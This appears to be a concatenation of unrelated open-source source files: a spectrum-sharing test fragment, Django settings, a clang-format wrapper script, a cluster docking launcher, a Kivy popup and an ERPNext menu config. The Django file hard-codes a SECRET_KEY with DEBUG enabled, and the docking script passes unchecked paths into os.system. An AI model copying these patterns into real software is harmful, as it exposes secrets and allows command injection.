raise
self.protected_entity_records['palRecords'] = config['palRecords']
# Register, inject PPA, and request grants.
logging.info('Steps 3 - 5: register, inject PPA, request grants.')
domain_proxy_config = config['domainProxy']
domain_proxy = test_harness_objects.DomainProxy(self,
domain_proxy_config['cert'],
domain_proxy_config['key'])
self.domain_proxy_objects.append(domain_proxy)
(sas_uut_ppa_record_with_cbsd_ids, sas_uut_ppa_record_with_reference_ids
) = domain_proxy.registerCbsdsAndRequestGrantsWithPpa(
domain_proxy_config['registrationRequests'],
domain_proxy_config['grantRequests'], config['ppaRecord'],
config['ppaClusterList'],
domain_proxy_config['conditionalRegistrationData'])
# Make sure SAS UUT's PPA is also checked for protection.
# At this point, we use the "with reference IDs" version because the pre-IAP
# filtering code compares against the CBSD reference ID in the FAD.
self.protected_entity_records['ppaRecords'].append(
sas_uut_ppa_record_with_reference_ids)
# FAD exchange.
logging.info('Step 6 + 7: FAD exchange.')
self.sas_uut_fad = getFullActivityDumpSasUut(self._sas, self._sas_admin,
self.fad_cert, self.fad_key)
self.test_harness_fads.append(
getFullActivityDumpSasTestHarness(
self.sas_test_harness_objects[0].getSasTestHarnessInterface()))
# Trigger CPAS in SAS UUT, and wait until completion.
logging.info('Step 8: trigger CPAS.')
self.cpas = self.cpas_executor.submit(
self.TriggerDailyActivitiesImmediatelyAndWaitUntilComplete)
logging.info('Step 9: execute IAP reference model.')
# Pre-IAP filtering.
pre_iap_filtering.preIapReferenceModel(self.protected_entity_records,
self.sas_uut_fad,
self.test_harness_fads)
# IAP reference model.
self.performIap()
logging.info('Waiting for CPAS to complete (started in step 8).')
self.cpas.result()
logging.info('CPAS started in step 8 complete.')
# Heartbeat, relinquish, grant, heartbeat
logging.info('Steps 10 - 13: heartbeat, relinquish, grant, heartbeat.')
domain_proxy.performHeartbeatAndUpdateGrants()
# Aggregate interference check
logging.info(
'Step 14 and CHECK: calculating and checking aggregate interference.')
# Before performing this check, we need to update the cluster list of SAS
# UUT's PPA to use the CBSD IDs -- rather than reference IDs -- since this
# is what the function getAuthorizedGrantsFromDomainProxies() expects. Note
# that we must keep the indexing the same since
# self.ppa_ap_iap_ref_values_list assumes consistent ordering of protected
# entities.
self.protected_entity_records['ppaRecords'][
1] = sas_uut_ppa_record_with_cbsd_ids
self.performIapAndDpaChecks()
| apache-2.0 | 6,128,459,033,703,096,000 | 41.120383 | 98 | 0.64102 | false |
h4/fuit-webdev | projects/logger/logger/settings.py | 1 | 5341 | # Django settings for logger project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
PROJECT_ROOT = os.path.dirname(os.path.realpath(__file__))
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'ocvuca%yvz(24m0kl%9v9fa08q1w+k*9qz_5wu2efclb04bb3o'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'logger.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'logger.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, '../templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'testhttp',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| mit | 1,071,628,346,005,622,400 | 33.458065 | 101 | 0.681333 | false |
daniestevez/gr-satellites | tools/clang_format.py | 1 | 26734 | #!/usr/bin/env python
# Copyright (C) 2015,2016 MongoDB Inc.
# Copyright (C) 2018 Free Software Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
A script that provides:
1. Validates clang-format is the right version.
2. Has support for checking which files are to be checked.
3. Supports validating and updating a set of files to the right coding style.
"""
import queue
import difflib
import glob
import itertools
import os
import re
import subprocess
from subprocess import check_output, CalledProcessError
import sys
import threading
import time
from distutils import spawn
from argparse import ArgumentParser
from multiprocessing import cpu_count
# Get relative imports to work when
# the package is not installed on the PYTHONPATH.
if __name__ == "__main__" and __package__ is None:
sys.path.append(
os.path.dirname(
os.path.dirname(os.path.abspath(os.path.realpath(__file__)))))
##############################################################################
#
# Constants for clang-format
#
#
# Expected version of clang-format
CLANG_FORMAT_VERSION = "10.0.1"
CLANG_FORMAT_SHORT_VERSION = "10.0"
# Name of clang-format as a binary
CLANG_FORMAT_PROGNAME = "clang-format"
# only valid c/c++ implementations and headers
files_match = re.compile('\\.(h|cc|c)$')
##############################################################################
def callo(args):
"""Call a program, and capture its output
"""
return check_output(args).decode('utf-8')
class ClangFormat(object):
"""Class encapsulates finding a suitable copy of clang-format,
and linting/formatting an individual file
"""
def __init__(self, path):
self.path = None
clang_format_progname_ext = ""
if sys.platform == "win32":
clang_format_progname_ext += ".exe"
# Check the clang-format the user specified
if path is not None:
if os.path.isfile(path):
self.path = path
else:
print("WARNING: Could not find clang-format %s" % (path))
# Check the users' PATH environment variable now
if self.path is None:
            # Check for various versions, starting with binaries with version-specific suffixes in the
# user's path
programs = [
CLANG_FORMAT_PROGNAME + "-" + CLANG_FORMAT_VERSION,
CLANG_FORMAT_PROGNAME + "-" + CLANG_FORMAT_SHORT_VERSION,
CLANG_FORMAT_PROGNAME,
]
if sys.platform == "win32":
for i in range(len(programs)):
programs[i] += '.exe'
for program in programs:
self.path = spawn.find_executable(program)
if self.path:
if not self._validate_version():
self.path = None
else:
break
# If Windows, try to grab it from Program Files
# Check both native Program Files and WOW64 version
if sys.platform == "win32":
programfiles = [
os.environ["ProgramFiles"],
os.environ["ProgramFiles(x86)"],
]
for programfile in programfiles:
win32bin = os.path.join(programfile,
"LLVM\\bin\\clang-format.exe")
if os.path.exists(win32bin):
self.path = win32bin
break
if self.path is None or not os.path.isfile(
self.path) or not self._validate_version():
print(
"ERROR:clang-format not found in $PATH, please install clang-format "
+ CLANG_FORMAT_VERSION)
raise NameError("No suitable clang-format found")
self.print_lock = threading.Lock()
def _validate_version(self):
"""Validate clang-format is the expected version
"""
cf_version = callo([self.path, "--version"])
if CLANG_FORMAT_VERSION in cf_version:
return True
print(
"WARNING: clang-format found in path, but incorrect version found at "
+ self.path + " with version: " + cf_version)
return False
def _lint(self, file_name, print_diff):
"""Check the specified file has the correct format
"""
with open(file_name, 'rb') as original_text:
original_file = original_text.read().decode("utf-8")
# Get formatted file as clang-format would format the file
formatted_file = callo([self.path, "--style=file", file_name])
if original_file != formatted_file:
if print_diff:
original_lines = original_file.splitlines()
formatted_lines = formatted_file.splitlines()
result = difflib.unified_diff(original_lines, formatted_lines)
# Take a lock to ensure diffs do not get mixed when printed to the screen
with self.print_lock:
print("ERROR: Found diff for " + file_name)
print("To fix formatting errors, run %s --style=file -i %s"
% (self.path, file_name))
for line in result:
print(line.rstrip())
return False
return True
def lint(self, file_name):
"""Check the specified file has the correct format
"""
return self._lint(file_name, print_diff=True)
def format(self, file_name):
"""Update the format of the specified file
"""
if self._lint(file_name, print_diff=False):
return True
# Update the file with clang-format
formatted = not subprocess.call(
[self.path, "--style=file", "-i", file_name])
# Version 3.8 generates files like foo.cpp~RF83372177.TMP when it formats foo.cpp
# on Windows, we must clean these up
if sys.platform == "win32":
glob_pattern = file_name + "*.TMP"
for fglob in glob.glob(glob_pattern):
os.unlink(fglob)
return formatted
def parallel_process(items, func):
"""Run a set of work items to completion
"""
try:
cpus = cpu_count()
except NotImplementedError:
cpus = 1
task_queue = queue.Queue()
# Use a list so that worker function will capture this variable
pp_event = threading.Event()
pp_result = [True]
def worker():
"""Worker thread to process work items in parallel
"""
while not pp_event.is_set():
try:
item = task_queue.get_nowait()
except queue.Empty:
# if the queue is empty, exit the worker thread
pp_event.set()
return
try:
ret = func(item)
finally:
# Tell the queue we finished with the item
task_queue.task_done()
# Return early if we fail, and signal we are done
if not ret:
# with pp_lock:
# pp_result[0] = False
print("{} failed on item {}".format(func, item))
# pp_event.set()
return
# Enqueue all the work we want to process
for item in items:
task_queue.put(item)
# Process all the work
threads = []
for cpu in range(cpus):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for the threads to finish
# Loop with a timeout so that we can process Ctrl-C interrupts
# Note: On Python 2.6 wait always returns None so we check is_set also,
# This works because we only set the event once, and never reset it
while not pp_event.wait(1) and not pp_event.is_set():
time.sleep(1)
for thread in threads:
thread.join()
return pp_result[0]
def get_base_dir():
"""Get the base directory for mongo repo.
This script assumes that it is running in buildscripts/, and uses
that to find the base directory.
"""
try:
return subprocess.check_output(
['git', 'rev-parse', '--show-toplevel']).rstrip().decode('utf-8')
except CalledProcessError:
# We are not in a valid git directory. Use the script path instead.
return os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
def get_repos():
"""Get a list of Repos to check clang-format for
"""
base_dir = get_base_dir()
# Get a list of modules
# GNU Radio is a single-git repo
# paths = [os.path.join(base_dir, MODULE_DIR, m) for m in gnuradio_modules]
paths = [base_dir]
return [Repo(p) for p in paths]
class Repo(object):
"""Class encapsulates all knowledge about a git repository, and its metadata
to run clang-format.
"""
def __init__(self, path):
self.path = path
self.root = self._get_root()
def _callgito(self, args):
"""Call git for this repository, and return the captured output
"""
        # These two flags are the equivalent of -C in newer versions of Git,
        # but we use them to support versions before 1.8.5; the effect depends
        # on the command and on the current directory.
return callo([
'git', '--git-dir', os.path.join(self.path, ".git"), '--work-tree',
self.path
] + args)
def _callgit(self, args):
"""Call git for this repository without capturing output
This is designed to be used when git returns non-zero exit codes.
"""
        # These two flags are the equivalent of -C in newer versions of Git,
        # but we use them to support versions before 1.8.5; the effect depends
        # on the command and on the current directory.
return subprocess.call([
'git', '--git-dir', os.path.join(self.path, ".git"), '--work-tree',
self.path
] + args)
def _get_local_dir(self, path):
"""Get a directory path relative to the git root directory
"""
if os.path.isabs(path):
return os.path.relpath(path, self.root)
return path
def get_candidates(self, candidates):
"""Get the set of candidate files to check by querying the repository
Returns the full path to the file for clang-format to consume.
"""
if candidates is not None and len(candidates) > 0:
candidates = [self._get_local_dir(f) for f in candidates]
valid_files = list(
set(candidates).intersection(self.get_candidate_files()))
else:
valid_files = list(self.get_candidate_files())
# Get the full file name here
valid_files = [
os.path.normpath(os.path.join(self.root, f)) for f in valid_files
]
return valid_files
def get_root(self):
"""Get the root directory for this repository
"""
return self.root
def _get_root(self):
"""Gets the root directory for this repository from git
"""
gito = self._callgito(['rev-parse', '--show-toplevel'])
return gito.rstrip()
def _git_ls_files(self, cmd):
"""Run git-ls-files and filter the list of files to a valid candidate list
"""
gito = self._callgito(cmd)
        # This allows us to pick all the interesting files
        # in the repository
file_list = [
line.rstrip()
for line in gito.splitlines()
# TODO: exclude directories if needed
# We don't want to lint volk
if not "volk" in line
]
file_list = [a for a in file_list if files_match.search(a)]
return file_list
def get_candidate_files(self):
"""Query git to get a list of all files in the repo to consider for analysis
"""
return self._git_ls_files(["ls-files", "--cached"])
def get_working_tree_candidate_files(self):
"""Query git to get a list of all files in the working tree to consider for analysis
"""
return self._git_ls_files(["ls-files", "--cached", "--others"])
def get_working_tree_candidates(self):
"""Get the set of candidate files to check by querying the repository
Returns the full path to the file for clang-format to consume.
"""
valid_files = list(self.get_working_tree_candidate_files())
# Get the full file name here
valid_files = [
os.path.normpath(os.path.join(self.root, f)) for f in valid_files
]
return valid_files
def is_detached(self):
"""Is the current working tree in a detached HEAD state?
"""
# symbolic-ref returns 1 if the repo is in a detached HEAD state
return self._callgit(["symbolic-ref", "--quiet", "HEAD"])
def is_ancestor(self, parent, child):
"""Is the specified parent hash an ancestor of child hash?
"""
# merge base returns 0 if parent is an ancestor of child
return not self._callgit(
["merge-base", "--is-ancestor", parent, child])
def is_commit(self, sha1):
"""Is the specified hash a valid git commit?
"""
# cat-file -e returns 0 if it is a valid hash
return not self._callgit(["cat-file", "-e", "%s^{commit}" % sha1])
def is_working_tree_dirty(self):
"""Does the current working tree have changes?
"""
# diff returns 1 if the working tree has local changes
return self._callgit(["diff", "--quiet"])
def does_branch_exist(self, branch):
"""Does the branch exist?
"""
# rev-parse returns 0 if the branch exists
return not self._callgit(["rev-parse", "--verify", branch])
def get_merge_base(self, commit):
"""Get the merge base between 'commit' and HEAD
"""
return self._callgito(["merge-base", "HEAD", commit]).rstrip()
def get_branch_name(self):
"""Get the current branch name, short form
This returns "master", not "refs/head/master"
Will not work if the current branch is detached
"""
branch = self.rev_parse(["--abbrev-ref", "HEAD"])
if branch == "HEAD":
raise ValueError("Branch is currently detached")
return branch
def add(self, command):
"""git add wrapper
"""
return self._callgito(["add"] + command)
def checkout(self, command):
"""git checkout wrapper
"""
return self._callgito(["checkout"] + command)
def commit(self, command):
"""git commit wrapper
"""
return self._callgito(["commit"] + command)
def diff(self, command):
"""git diff wrapper
"""
return self._callgito(["diff"] + command)
def log(self, command):
"""git log wrapper
"""
return self._callgito(["log"] + command)
def rev_parse(self, command):
"""git rev-parse wrapper
"""
return self._callgito(["rev-parse"] + command).rstrip()
def rm(self, command):
"""git rm wrapper
"""
return self._callgito(["rm"] + command)
def show(self, command):
"""git show wrapper
"""
return self._callgito(["show"] + command)
def get_list_from_lines(lines):
""""Convert a string containing a series of lines into a list of strings
"""
return [line.rstrip() for line in lines.splitlines()]
def get_files_to_check_working_tree():
"""Get a list of files to check form the working tree.
This will pick up files not managed by git.
"""
repos = get_repos()
valid_files = list(
itertools.chain.from_iterable(
[r.get_working_tree_candidates() for r in repos]))
return valid_files
def get_files_to_check():
"""Get a list of files that need to be checked
based on which files are managed by git.
"""
repos = get_repos()
valid_files = list(
itertools.chain.from_iterable([r.get_candidates(None) for r in repos]))
return valid_files
def get_files_to_check_from_patch(patches):
"""
Take a patch file generated by git diff,
and scan the patch for a list of files to check.
"""
candidates = []
# Get a list of candidate_files
check = re.compile(
r"^diff --git a\/([a-z\/\.\-_0-9]+) b\/[a-z\/\.\-_0-9]+")
candidates = []
for patch in patches:
if patch == "-":
infile = sys.stdin
else:
infile = open(patch, "rb")
candidates.extend([
check.match(line).group(1) for line in infile.readlines()
if check.match(line)
])
infile.close()
repos = get_repos()
valid_files = list(
itertools.chain.from_iterable(
[r.get_candidates(candidates) for r in repos]))
return valid_files
def _lint_files(clang_format, files):
"""Lint a list of files with clang-format
"""
try:
clang_format = ClangFormat(clang_format)
except NameError as e:
print(e)
return False
lint_clean = parallel_process([os.path.abspath(f) for f in files],
clang_format.lint)
if not lint_clean:
print("ERROR: Code Style does not match coding style")
sys.exit(1)
def lint(args):
"""Lint files command entry point
"""
if args.patch and args.all:
print("Only specify patch or all, but not both!")
return False
if args.patch:
files = get_files_to_check_from_patch(args.patch)
elif args.all:
files = get_files_to_check_working_tree()
else:
files = get_files_to_check()
if files:
_lint_files(args.clang_format, files)
return True
def _format_files(clang_format, files):
"""Format a list of files with clang-format
"""
try:
clang_format = ClangFormat(clang_format)
except NameError as e:
print(e)
        return False
format_clean = parallel_process([os.path.abspath(f) for f in files],
clang_format.format)
if not format_clean:
print("ERROR: failed to format files")
sys.exit(1)
def _reformat_branch(clang_format, commit_prior_to_reformat,
commit_after_reformat):
"""Reformat a branch made before a clang-format run
"""
try:
clang_format = ClangFormat(clang_format)
except NameError as e:
print(e)
return False
if os.getcwd() != get_base_dir():
raise ValueError("reformat-branch must be run from the repo root")
repo = Repo(get_base_dir())
# Validate that user passes valid commits
if not repo.is_commit(commit_prior_to_reformat):
raise ValueError(
"Commit Prior to Reformat '%s' is not a valid commit in this repo"
% commit_prior_to_reformat)
if not repo.is_commit(commit_after_reformat):
raise ValueError(
"Commit After Reformat '%s' is not a valid commit in this repo" %
commit_after_reformat)
if not repo.is_ancestor(commit_prior_to_reformat, commit_after_reformat):
raise ValueError((
"Commit Prior to Reformat '%s' is not a valid ancestor of Commit After"
+ " Reformat '%s' in this repo") % (commit_prior_to_reformat,
commit_after_reformat))
# Validate the user is on a local branch that has the right merge base
if repo.is_detached():
raise ValueError(
"You must not run this script in a detached HEAD state")
# Validate the user has no pending changes
if repo.is_working_tree_dirty():
raise ValueError(
"Your working tree has pending changes. You must have a clean working tree before proceeding."
)
merge_base = repo.get_merge_base(commit_prior_to_reformat)
if not merge_base == commit_prior_to_reformat:
raise ValueError(
"Please rebase to '%s' and resolve all conflicts before running this script"
% (commit_prior_to_reformat))
# We assume the target branch is master, it could be a different branch if needed for testing
merge_base = repo.get_merge_base("master")
if not merge_base == commit_prior_to_reformat:
raise ValueError(
"This branch appears to already have advanced too far through the merge process"
)
# Everything looks good so lets start going through all the commits
branch_name = repo.get_branch_name()
new_branch = "%s-reformatted" % branch_name
if repo.does_branch_exist(new_branch):
raise ValueError(
"The branch '%s' already exists. Please delete the branch '%s', or rename the current branch."
% (new_branch, new_branch))
commits = get_list_from_lines(
repo.log([
"--reverse", "--pretty=format:%H", "%s..HEAD" %
commit_prior_to_reformat
]))
previous_commit_base = commit_after_reformat
# Go through all the commits the user made on the local branch and migrate to a new branch
# that is based on post_reformat commits instead
for commit_hash in commits:
repo.checkout(["--quiet", commit_hash])
deleted_files = []
# Format each of the files by checking out just a single commit from the user's branch
commit_files = get_list_from_lines(repo.diff(["HEAD~", "--name-only"]))
for commit_file in commit_files:
# Format each file needed if it was not deleted
if not os.path.exists(commit_file):
print(
"Skipping file '%s' since it has been deleted in commit '%s'"
% (commit_file, commit_hash))
deleted_files.append(commit_file)
continue
if files_match.search(commit_file):
clang_format.format(commit_file)
else:
print(
"Skipping file '%s' since it is not a file clang_format should format"
% commit_file)
# Check if anything needed reformatting, and if so amend the commit
if not repo.is_working_tree_dirty():
print("Commit %s needed no reformatting" % commit_hash)
else:
repo.commit(["--all", "--amend", "--no-edit"])
        # Rebase our new commit on top of the post-reformat commit
previous_commit = repo.rev_parse(["HEAD"])
# Checkout the new branch with the reformatted commits
# Note: we will not name as a branch until we are done with all commits on the local branch
repo.checkout(["--quiet", previous_commit_base])
# Copy each file from the reformatted commit on top of the post reformat
diff_files = get_list_from_lines(
repo.diff([
"%s~..%s" % (previous_commit, previous_commit), "--name-only"
]))
for diff_file in diff_files:
# If the file was deleted in the commit we are reformatting, we need to delete it again
if diff_file in deleted_files:
repo.rm([diff_file])
continue
if "volk" in diff_file:
continue
# The file has been added or modified, continue as normal
file_contents = repo.show(["%s:%s" % (previous_commit, diff_file)])
root_dir = os.path.dirname(diff_file)
if root_dir and not os.path.exists(root_dir):
os.makedirs(root_dir)
with open(diff_file, "w+") as new_file:
new_file.write(file_contents)
repo.add([diff_file])
# Create a new commit onto clang-formatted branch
repo.commit(["--reuse-message=%s" % previous_commit])
previous_commit_base = repo.rev_parse(["HEAD"])
# Create a new branch to mark the hashes we have been using
repo.checkout(["-b", new_branch])
print("reformat-branch is done running.\n")
print(
"A copy of your branch has been made named '%s', and formatted with clang-format.\n"
% new_branch)
print("The original branch has been left unchanged.")
print("The next step is to rebase the new branch on 'master'.")
def format_func(args):
"""Format files command entry point
"""
if args.all and args.branch is not None:
print("Only specify branch or all, but not both!")
return False
if not args.branch:
if args.all:
files = get_files_to_check_working_tree()
else:
files = get_files_to_check()
_format_files(args.clang_format, files)
else:
_reformat_branch(args.clang_format, *args.branch)
def parse_args():
"""
Parse commandline arguments
"""
parser = ArgumentParser()
parser.add_argument(
"-c",
"--clang-format",
default="clang-format",
help="clang-format binary")
subparsers = parser.add_subparsers(help="clang-format action", dest="action")
subparsers.required = True
lint_parser = subparsers.add_parser(
"lint", help="Lint-only (no modifications)")
lint_parser.add_argument("-a", "--all", action="store_true")
lint_parser.add_argument("-p", "--patch", help="patch to check")
lint_parser.set_defaults(func=lint)
format_parser = subparsers.add_parser(
"format", help="Format files in place")
format_parser.add_argument(
"-b",
"--branch",
nargs=2,
default=None,
help="specify the commit hash before the format and after the format has been done"
)
format_parser.add_argument("-a", "--all", action="store_true")
format_parser.set_defaults(func=format_func)
return parser.parse_args()
def main():
"""Main entry point
"""
args = parse_args()
if hasattr(args, "func"):
args.func(args)
if __name__ == "__main__":
main()
| gpl-3.0 | -4,323,851,137,709,461,500 | 31.404848 | 106 | 0.584312 | false |
ruthbrenk/DrugPred2.0 | cl_startdock.py | 1 | 1537 | #!/usr/bin/python
#run as array job
#if files are bzipped -> copy to local disk and unzip there
import os,sys
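# Expected invocation (sketch): python cl_startdock.py <db_dir>/ <True|False>
# <db_dir> holds the database files to dock (.db, or bzipped .db.bz2); the second
# argument says whether those files are bzipped.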
db_dir = sys.argv[1]
zipped = sys.argv[2] #are files bzipped?
if zipped == 'True':
zipped = True
else:
zipped = False
files = os.listdir(db_dir)
file = '#$ -S /bin/tcsh\n#$ -cwd\n#$ -V\n'
path = os.getcwd()
counter = 1
for i in files: #set up all sub dirs with correct input files
	if i[-2:] == 'db' or i[-2:] == 'z2': #match plain .db and bzipped .db.bz2 files
sub_dir = 'acd_' + str(counter)
if not os.path.exists(sub_dir):
os.system('mkdir ' + sub_dir)
os.chdir(path + '/' + sub_dir)
os.system('cp ../INDOCK .')
command = 'ln -s ' + db_dir + i + ' db_file'
print command
os.system(command)
counter = counter + 1
os.chdir('..')
#create file to submit array job
start_file = open('start_dock.bin', 'w')
start_file.write(file)
start_file.write('cd acd_$SGE_TASK_ID\n')
if zipped: #files must be unzipped, to save diskspace to do this on temporary cluster disk, $TMPDIR
start_file.write('ls -larth *\n') #save name of db file that should be docked
start_file.write('cp db_file $TMPDIR/db_file.db.bz2\n')
start_file.write('bunzip2 $TMPDIR/db_file.db.bz2\n')
start_file.write('unlink db_file\n')
start_file.write('ln -s $TMPDIR/db_file.db db_file\n')
start_file.write('/software/dockenv/bin/Linux/dock_vol.test\n')
if zipped:
start_file.write('unlink db_file\n')
start_file.write('rm -f *.1')
start_file.close()
os.system('chmod 755 start_dock.bin')
os.system('qsub -q 64bit-pri.q,64bit.q -t 1-' + str(counter-1) + ' start_dock.bin')
| gpl-2.0 | 5,979,030,986,141,396,000 | 25.050847 | 100 | 0.659727 | false |
overfl0/Bulletproof-Arma-Launcher | src/view/messagebox.py | 1 | 1628 | # Bulletproof Arma Launcher
# Copyright (C) 2016 Lukasz Taczuk
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from __future__ import unicode_literals
import sys
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from utils import browser
from view.chainedpopup import ChainedPopup
default_title = """Message"""
def open_hyperlink(obj, ref):
browser.open_hyperlink(ref)
class MessageBox(ChainedPopup):
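    """Popup showing a text message (markup and hyperlinks supported) with an optional Ok button."""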
def __init__(self, text, title=default_title, markup=False, on_dismiss=None,
hide_button=False, auto_dismiss=True):
bl = BoxLayout(orientation='vertical')
la = Label(text=text, size_hint_y=0.8, markup=markup)
la.bind(on_ref_press=open_hyperlink)
button = Button(text="Ok", size_hint_y=0.2)
button.bind(on_release=self.dismiss)
bl.add_widget(la)
if not hide_button:
bl.add_widget(button)
super(MessageBox, self).__init__(
title=title, content=bl, size_hint=(None, None), size=(600, 500),
auto_dismiss=auto_dismiss)
# Bind an optional handler when the user closes the message
if on_dismiss:
self.bind(on_dismiss=on_dismiss)
| gpl-3.0 | -136,472,453,782,485,700 | 32.22449 | 80 | 0.693489 | false |
VisheshHanda/production_backup | erpnext/config/schools.py | 1 | 3531 | from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Student"),
"items": [
{
"type": "doctype",
"name": "Student"
},
{
"type": "doctype",
"name": "Guardian"
},
{
"type": "doctype",
"name": "Student Log"
},
{
"type": "doctype",
"name": "Student Group"
},
{
"type": "doctype",
"name": "Student Group Creation Tool"
},
{
"type": "report",
"is_query_report": True,
"name": "Student and Guardian Contact Details",
"doctype": "Program Enrollment"
}
]
},
{
"label": _("Admission"),
"items": [
{
"type": "doctype",
"name": "Student Applicant"
},
{
"type": "doctype",
"name": "Student Admission"
},
{
"type": "doctype",
"name": "Program Enrollment"
},
{
"type": "doctype",
"name": "Program Enrollment Tool"
}
]
},
{
"label": _("Attendance"),
"items": [
{
"type": "doctype",
"name": "Student Attendance"
},
{
"type": "doctype",
"name": "Student Leave Application"
},
{
"type": "doctype",
"name": "Student Attendance Tool"
},
{
"type": "report",
"is_query_report": True,
"name": "Absent Student Report",
"doctype": "Student Attendance"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Batch-Wise Attendance",
"doctype": "Student Attendance"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Monthly Attendance Sheet",
"doctype": "Student Attendance"
}
]
},
{
"label": _("Schedule"),
"items": [
{
"type": "doctype",
"name": "Course Schedule",
"route": "List/Course Schedule/Calendar"
},
{
"type": "doctype",
"name": "Course Scheduling Tool"
}
]
},
{
"label": _("Assessment"),
"items": [
{
"type": "doctype",
"name": "Assessment Plan"
},
{
"type": "doctype",
"name": "Assessment Group",
"link": "Tree/Assessment Group",
},
{
"type": "doctype",
"name": "Assessment Result"
},
{
"type": "doctype",
"name": "Grading Scale"
},
{
"type": "doctype",
"name": "Assessment Criteria"
},
{
"type": "doctype",
"name": "Assessment Criteria Group"
},
{
"type": "doctype",
"name": "Assessment Result Tool"
}
]
},
{
"label": _("Fees"),
"items": [
{
"type": "doctype",
"name": "Fees"
},
{
"type": "doctype",
"name": "Fee Structure"
},
{
"type": "doctype",
"name": "Fee Category"
},
{
"type": "report",
"name": "Student Fee Collection",
"doctype": "Fees",
"is_query_report": True
}
]
},
{
"label": _("Setup"),
"items": [
{
"type": "doctype",
"name": "Course"
},
{
"type": "doctype",
"name": "Program"
},
{
"type": "doctype",
"name": "Instructor"
},
{
"type": "doctype",
"name": "Room"
},
{
"type": "doctype",
"name": "Student Category"
},
{
"type": "doctype",
"name": "Student Batch Name"
},
{
"type": "doctype",
"name": "Academic Term"
},
{
"type": "doctype",
"name": "Academic Year"
},
{
"type": "doctype",
"name": "School Settings"
}
]
},
]
